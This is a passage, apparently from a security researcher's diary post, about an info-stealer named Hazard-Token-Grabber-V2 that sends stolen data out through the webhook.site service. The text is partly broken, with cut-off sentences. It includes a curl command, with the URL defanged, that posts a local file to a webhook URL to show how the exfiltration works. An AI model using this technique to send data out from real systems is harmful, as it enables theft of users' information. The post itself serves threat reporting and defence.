We already reported multiple times that, when you offer an online (cloud) service, there are a lot of chances that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through
The malicious tool is Hazard-Token-Grabber-V2, available on GitHub[2] for a few days. Actually, it has a very low VT score: 3/56[3]. The script extracts a lot of information from the infected system:
How does work https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2 I sent this requests: $ echo “This is a far file” >file.txt $ curl -X POST --data-binary @file.txt hxxps://webhook[.]site/4accef15-fa3b-4926-a853-2b020accd3a2 Data is instantly received by the webhook that the attacker is probably monitoring: A very efficient and stealthy way to exfiltrate data! [1] https://en.wikipedia.org/wiki/Webhook Xavier Mertens (@xme) |
Xme 687 Posts ISC Handler Dec 1st 2021 |
Thread locked Subscribe |
Dec 1st 2021 5 months ago |
Sign Up for Free or Log In to start participating in the conversation!